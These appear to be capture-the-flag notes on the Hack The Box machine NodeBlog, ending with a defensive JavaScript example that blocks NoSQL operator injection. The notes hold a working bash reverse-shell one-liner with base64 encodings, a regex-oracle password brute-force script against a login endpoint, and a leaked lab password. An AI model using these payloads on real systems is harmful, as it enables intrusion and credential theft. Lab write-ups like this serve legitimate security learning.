Hack the Box : NodeBlog

Hack The Box

The payload-encoding part was the hard bit: URL encoding, swapping some special characters, base64...

00:47 NoSQL injection

NoSQL injection - HackTricks

01:20 XML external entity injection

What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
XML External Entity (XXE) Processing | OWASP Foundation

01:52 node-serialize code execution vulnerability

node-serialize vulnerabilities | Snyk

02:44 reverse shell

'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzEyMzQgMD4mMQ==

The "+" in the base64 output caused trouble (it is decoded as a space once the payload is URL-decoded), so I added one more space to the command to shift the encoding and get rid of it.
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0IDA+JjE=

There was still a "+", so one more space.
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234  0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0ICAwPiYx

03:08 mongodb

> show dbs
admin   0.000GB
blog    0.000GB
config  0.000GB
local   0.000GB

> use blog
switched to db blog

> show collections
articles
users

> db.users.find()
{ "_id" : ObjectId("61b7380ae5814df6030d2373"), "createdAt" : ISODate("2021-12-13T12:09:46.009Z"), "username" : "admin", "password" : "IppsecSaysPleaseSubscribe", "__v" : 0 }
List Users — MongoDB Manual

03:34 password brute force script using $regex

$regex — MongoDB Manual
import sys
import string
import requests
import json

# Send a login whose password field is a {"$regex": ...} object instead of a
# string. The server drops the JSON straight into its Mongo query, so the
# "Invalid Password" message becomes an oracle for whether the pattern
# matches the stored password.
def make_password(pswd):
    payload = '{ "$regex": "%s"}' % pswd
    login_data = {"user": "admin", "password": json.loads(payload)}
    req = requests.post("http://10.10.11.139:5000/login", json=login_data)
    if "Invalid Password" in req.text:
        return False
    return True

# Grow the password one character at a time, anchored at the start.
password = '^'
result = False
while not result:
    for i in string.ascii_letters:
        new_password = password + i
        sys.stdout.write(f"\r{new_password}")
        sys.stdout.flush()

        if make_password(new_password):
            password += i
            break
    else:
        # No letter extended the prefix: confirm the full password with an
        # end anchor and stop, instead of looping forever.
        result = make_password(password + '$')
        if not result:
            print("\nno match; password may contain non-letter characters")
            break

print(f"\npassword: {password[1:]}")

Maybe I should add a counter to stop its loop at the end.
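Why the `{"$regex": ...}` trick above works, and what the login handler should have done instead, as an added example in JavaScript (not code from the NodeBlog box or the video). The field names `user` and `password` are assumed to mirror the script above; `matchesPassword` is a constructed stand-in for the server's query evaluation, and no MongoDB driver is used.

```javascript
// Vulnerable (constructed): the request body is dropped straight into the
// query, so an object value becomes a query operator instead of a literal.
function buildLoginQueryUnsafe(body) {
  return { username: body.user, password: body.password };
}

// Mimic how the server evaluates the password clause of such a query
// against a stored document: a string is compared for equality, an object
// carrying $regex is evaluated as a pattern. This is the oracle the script
// above drives one character at a time.
function matchesPassword(stored, clause) {
  if (typeof clause === "string") return stored === clause;
  if (clause && typeof clause.$regex === "string") {
    return new RegExp(clause.$regex).test(stored);
  }
  return false;
}

// Walk a parsed body and collect every key beginning with "$" (a Mongo
// operator); a login form should never carry one. Returns dotted paths,
// which is also what you would want to log for detection.
function findOperatorKeys(value, path = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findOperatorKeys(v, `${path}[${i}]`)));
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const p = path ? `${path}.${k}` : k;
      if (k.startsWith("$")) hits.push(p);
      hits.push(...findOperatorKeys(v, p));
    }
  }
  return hits;
}

// Hardened: credentials must be plain strings and the body must carry no
// operator keys, so {"$regex": ...} is refused before any query is built.
// (Storing a password hash instead of the plaintext seen in db.users.find()
// above is the other half of the fix.)
function buildLoginQuerySafe(body) {
  if (typeof body.user !== "string" || typeof body.password !== "string") {
    return null;
  }
  if (findOperatorKeys(body).length > 0) return null;
  return { username: body.user, password: body.password };
}
```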